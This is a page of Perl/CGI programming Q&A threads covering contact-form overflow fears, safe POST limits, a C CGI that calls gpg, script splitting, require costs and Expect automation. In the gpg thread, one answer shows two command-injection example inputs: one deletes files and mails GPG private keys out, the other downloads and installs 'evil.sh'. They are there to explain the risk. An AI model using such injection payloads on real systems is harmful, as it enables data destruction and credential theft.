Do Perl CGI programs have a buffer overflow or script vulnerability for HTML contact forms? - perl

My hosting company says it is possible to fill an HTML form text input field with just the right amount of garbage bytes to cause a buffer overflow/resource problem when used with Apache/HTTP POST to a CGI-Bin Perl script (such as NMS FormMail).
They say a core dump occurs at which point an arbitrary script (stored as part of the input field text) can be run on the server which can compromise the site. They say this isn't something they can protect against in their Apache/Perl configuration—that it's up to the Perl script to prevent this by limiting number of characters in the posted fields. But it seems like the core dump could occur before the script can limit field sizes.
This type of contact form and method is in wide use by thousands of sites, so I'm wondering if what they say is true. Can you security experts out there enlighten me—is this true? I'm also wondering if the same thing can happen with a PHP script. What do you recommend for a safe site contact script/method?

I am not sure about the buffer overflow, but in any case it can't hurt to limit the POST size anyway. Just add the following on top of your script:
use CGI qw/:standard/;
$CGI::POST_MAX=1024 * 100; # max 100K posts
$CGI::DISABLE_UPLOADS = 1; # no uploads

Ask them to provide you with a specific reference to the vulnerability. I am sure there are versions of Apache where it is possible to cause buffer overflows by specially crafted POST requests, but I don't know any specific to NMS FormMail.

You definitely should ask for specifics from your hosting company. There are a lot of unrelated statements in there.
A "buffer overflow" and a "resource problem" are completely different things. A buffer overflow suggests that you will crash perl or mod_perl or httpd themselves. If this is the case, then there is a bug in one of these components, and they should reference the bug in question and provide a timeline for when they will be applying the security update. Such a bug would certainly make Bugtraq.
A resource problem on the other hand, is a completely different thing. If I send you many megabytes in my POST, then I could eat an arbitrary amount of memory. This is resolvable by configuring the LimitRequestBody directive in httpd.conf. The default is unlimited. This has to be set by the hosting provider.
They say a core dump occurs at which point an arbitrary script (stored as part of the input field text) can be run on the server which can compromise the site. They say this isn't something they can protect against in their Apache/Perl configuration—that it's up to the Perl script to prevent this by limiting number of characters in the posted fields. But it seems like the core dump could occur before the script can limit field sizes.
Again, if this is creating a core dump in httpd (or mod_perl), then it represents a bug in httpd (or mod_perl). Perl's dynamic and garbage-collected memory management is not subject to buffer overflows or bad pointers in principle. This is not to say that a bug in perl itself cannot cause this, just that the perl language itself does not have the language features required to cause core dumps this way.
By the time your script has access to the data, it is far too late to prevent any of the things described here. Your script of course has its own security concerns, and there are many ways to trick perl scripts into running arbitrary commands. There just aren't many ways to get them to jump to arbitrary memory locations in the way that's being described here.

Formail has been vulnerable to such in the past so I believe your ISP was using this to illustrate. Bad practices in any perl script could lead to such woe.
I recommend ensuring the perl script verifies all user input if possible. Otherwise only use trusted scripts and ensure you keep them updated.

Related

Is running a C/C++ CGI script on Apache dangerous?

I am currently programming my own little website system (a script that compiles Markdown documents, and puts them in appropriate locations, thus making a quick, static website).
I would like to enable people who go to my (initially static) contact page, to send me a GnuPG-encrypted message.
Basically, the visitor writes his or her message in a contact form, clicks this checkbox if they want the message to be encrypted, and upon receiving the form, a C(?) program of mine calls system("gpg --encrypt --recipient 31A49121CD42FF00 --armor <the_message>");
(I have yet to determine how to effectively get the message contents and use it in a command without writing the unencrypted message to disk).
Is it (un)secure to use exec() in a self-made C program that processes form data? Is there a simpler way to achieve what I want to do (using a standalone script—because my website is static—to run GPG)? Any security considerations I haven’t thought about?
I am asking on here instead of Security SE because I am looking for answers with developers’ points of view.
As a security professional who makes at least a modest living consulting on the subject, and a rather prolific C programmer I can give you a few different thoughts on the subject.
When you are considering security of processes executing on your target, you have to consider a number of things and how someone may abuse the situation.
A glimpse
Let's look at the immediate security problem that I see just off hand, you are using the "system()" call directly on <the_message> ; Can you imagine the following:
the_message="hello and goodbye; rm -rf *; cat $HOME/.gpg/* | /usr/bin/sendmail -s 'these are the private keys' temporary_account#hotmail.com" or worse;
the_message="hello and goodbye; wget http://some.remote.system.com/evil.sh && mv evil.sh ~/.profile;"
So the first thing to do is never use anything provided by a user as a command or part of a command-line; save the message to a temporary text file and encrypt that;
A slightly deeper look
Okay so what's going on in terms of using C; Before I give you the answer, I would like to say I love C; I almost exclusively program in C and have been a professional developer with main focus on C for last 24 years. Now, I would like to say that C is a horrid tool for writing a CGI program in, and you should only do it if you have a truly compelling reason. And after you find that reason, you should discard it anyways and abandon the thought.
Here are some reasons why you SHOULDN'T use C for a CGI interface.
CGI/1.1 is an ugly standard; It uses environment variables, stdin, and all sorts of character remapping and recoding just to get data across. You are invariably going to have to deal with either implementing a cgi interface or using libcgi or some equivalent library in order to deal with all the permutations, and at the end you'll just hate yourself for it.
When I used http://libcgi.sourceforge.net for a particular project I had to debug and harden and augment it because it had some horrible buffer over flow issues left right and center, non-existant utf-8 support and limited control over authentication.
But even if you have that covered, C is generally a bad idea because a lot of the security issues arise out of the manual manipulation of memory that one has to do.
A higher level language (shell script, awk, perl, php etc.) is a much better tool to handle CGI; Perl was almost built for it, and PHP was specially built for it. Another advantage of using perl or PHP in your situation is that GnuPG modules are available so that you don't have to system() anything;
The key to good development is to use the easiest, most straightforward toolkit for the job; In your case I think you should NOT use C, as it would force you to do things that are already very well done for you in form of a proper CGI processing language such as PHP.
Those are my thoughts; I hope that you will

How to split long Perl code into several files without too much manual editing?

How do I split a long Perl script into two or more different files that can all access the same variables - without having to rename all shared variables from e.g. $count to $::count (or $main::count which is the same)?
In other words, what's the best and simplest way to split the Perl script into several files without having to import a lot of variables/functions and/or do a lot of manual editing.
I assume it has something to do with making the code part of the same package/scope/namespace, but my experiments so far have failed.
I am not sure it makes a difference, but the script is used for web/CGI purposes and will be running under mod_perl.
EDIT - Background:
I kind of knew I would get that response. The reason I want to split up the file is the following:
Currently I have a single very old and very long Perl file. I know it is not following Perl best practices but it works.
The problem is, I need to distribute the data files it uses between different web servers, first of all for performance reasons. There will be one "master" server and one or several "slaves".
About 20% of the mentioned Perl file contains shared functions, 40% has the code need to run on the master server and 40% on the slave servers. Therefore, I would like to split the code into three files: 1. shared, 2. master-only, 3. slave-only. On the master server, 1 and 2 will be loaded, on the slaves, 1 and 3 will be loaded.
I assume this approach would use less process RAM and, more importantly, I would minimize the risk of not splitting the code correctly (e.g. a slave process calling a master data file). I don't see a great need for modularization, as the system works and the code does not need a lot of changes or exchanges with other projects.
EDIT 2 - Solution:
Found the solution I was looking for here:
http://www.perlmonks.org/?node_id=95813
In cases where the main package is in ownership of the variable, the
actual word 'main' can be ommitted to yield something like: $::var
It is possible to get around having to fully qualify variable names
when strict is in use. Applying a simply use vars to your script, with
the variable names as it arguments will get around explicit package
names.
Actually, I ended up repeating the our ($count, etc...) statement for the needed variables instead of use vars ();
Do let me know if I am missing something vital - apart from not going with modules! :)
#Axeman, Thanks, I will accept your answer, both for your effort and for sending me in the right direction.
Unless you put different package statements in their files, they will all be treated as if they had package main; at the top. So assuming that the scripts use package variables, you shouldn't have to do anything. If you have declared them with my (that is, if they are lexically scoped variables) then you would have to make sure that all references to the variables are in the same file.
But splitting scripts up for length is a rotten substitute for modularization. Yes, modularization helps keep code length down, but modularization if the proper way to keep code length down--for all the reasons that you would want to keep code-length down, modularization does it best.
If chopping the files by length could really work for you, then you could create a script like this:
do '/path/to/bin/part1.pl';
do '/path/to/bin/part2.pl';
do '/path/to/bin/part3.pl';
...
But I kind of suspect that if the organization of this code is as bad as you're--sort of--indicating, it might suffer from some of the same re-inventing the wheel that I've seen in Perl-ignorant scripts. Just offhand (I might be wrong) but I'm thinking you would be surprised how much could be chopped from the length by simply substituting better-tested Perl library idioms than for-looping and while-ing everything.

how to perl for bi-directional communication with dsmadmc.exe?

I have simple web-form with a little js script that sends form values to a text box. This combined value becomes a database query.
This will be sendt to dsmadmc (TSM administrative command line).
How can I use perl to keep the dsmadmc process open for consecutive input/output without the dsmadmc process closing between each input command sent?
And how can I capture the output - this is to be sent back to the same web page, in a separate div.
Any thought, anyone?
Probably IPC::Open2 could help. It allows to read/write to/from both input and output of an external process.
Beware of deadlocks though (i.e. situations where both your code and the app wait for their counterpart). You might want to use IO::Select to handle that.
P.S. I don't know how these modules behave on windows (.exe?..), but from a quick google search it looks like they are compatible.

How expensive is: require "foo.pl";

I'm about to rewrite a large portion of a project that I have developed over the last 10years while learning perl. There is alot of optimisation that can be gained.
A key part of the code is a large if/elsif block that require xxx.cgi files depending on a POST value. Eg:
if($FORM{'action'} eq "1"){require "1.cgi";}
elsif($FORM{'action'} eq "2"){require "2.cgi";}
elsif($FORM{'action'} eq "3"){require "3.cgi";}
elsif($FORM{'action'} eq "4"){require "4.cgi";}
It has many more irritations but just how expensive is using "require" in perl?
require itself has a relatively low cost in any case and, if you require the same file more than once within a single run of your program, it will detect that the file has already been loaded and not attempt to load it a second time. However, if you have a long and highly-populated search path (#INC) and you require (or use) a lot of files, it's possible that all of the directory searches could add up; this isn't common (and doesn't sound likely in your case), but it can be improved by reorganizing your module directories so that the things you're loading show up earlier in #INC.
The potentially-major performance hit referred to by earlier answers is the cost of compiling the code in the files you require. Getting rid of the require by moving the code into your main program will not help with this, as the code will still need to be compiled. In your case, it would probably make things worse, as it would cause the code for all options to be compiled on every one rather than only compiling the code used by the one action selected by the user.
As has been said, it really depends on the actual code in those files. Your best bet would be to do tests using Devel::NYTProf and/or Benchmark to see where the most time is being spent in your code if you are unhappy with its performance.
You can also read Profiling Perl on perl.com, but it is a bit outdated as it uses Devel::DProf.
Not answer to your primary question, but still a good idea for code refactor i read recently in Ovid blog.
The first time, possibly expensive; Perl has to search a path to find the file and load it up. Subsequent times, it's cheap -- a table is consulted and the file isn't actually loaded a second time. If this is in a CGI that is run once per request and then exited, then this is not too good.
It's really going to depend on the size of the files you're calling to. If you have massive CGI files, then it might detriment the performance of your software. If we're talking 6 or 7 lines of code each, then no issue. Try benchmarking your program's performance with and without, and make your own judgement.

How can I control an interactive Unix application programmatically through Perl?

I have inherited a 20-year-old interactive command-line unix application that is no longer supported by its vendor. We need to automate some tasks in this application.
The most troublesome of these is creating thousands of new records with slightly different parameters (e.g. different identifiers, different names). The records have to be created in sequence, one at a time, which would take many months (and therefore dollars) to do manually. In most cases, creating a record has a very predictable pattern of keying in commands, reading responses, keying in further commands, etc. However, some record creation operations will result in error conditions ('record with this identifier already exists') that require a different set of commands to be exit gracefully.
I can see a few different ways to do this:
Named pipes. Write a Perl script that runs the target application with STDIN and STDOUT set to named pipes then sends the target application the sequence of commands to create a record with the required parameters, and then instructs the target application to exit and shut down. We then run the script as many times as required with different parameters.
Application. Find another Unix tool that can be used to script interactive programs. The only ones I have been able to find though are expect, but this does not seem top be maintained; and chat, which I recall from ages ago, and which seems to do more-or-less what I want, but appears to be only for controlling modems.
One more potential complication: I think the target application was written for a VT100 terminal and it uses some sort of escape sequences to do things like provide highlighting.
My question is what approach should I take? One of these, or something completely different? I quite like the idea of using named pipes and then having a Perl script that opens the FIFOs and reads and writes as required, as it provides a lot of flexibility, but from what I have read it seems like there's a lot of potential problems if I go down this path.
Thanks in advance.
I'd definitely stick to Perl for the extra flexibility, as chaos suggested. Are you aware of the Expect perl module? It's a lot nicer than the named pipe approach.
Note also with named pipes, you can't force the output coming back from your legacy application to be unbuffered, which could be annoying. I think Expect.pm uses pseudo-ttys to get around this problem, but I'm not sure. See the discussion in perlipc in the section "Bidirectional Communication with Another Process" for more details.
expect is a lot more solid than you're probably giving it credit for, but if I were you I'd still go with the Perl option, wanting to have a full and familiar programming language for managing the process and having confidence that whatever weird issues arise, there will be ways of addressing them.
Expect, either with the Tcl or Perl implementations, would be my first attempt. If you are seeing odd sequences in the output because it's doing odd terminal things, just filter those from the output before you do your matching.
With named pipes, you're going to end up reinventing Expect anyway.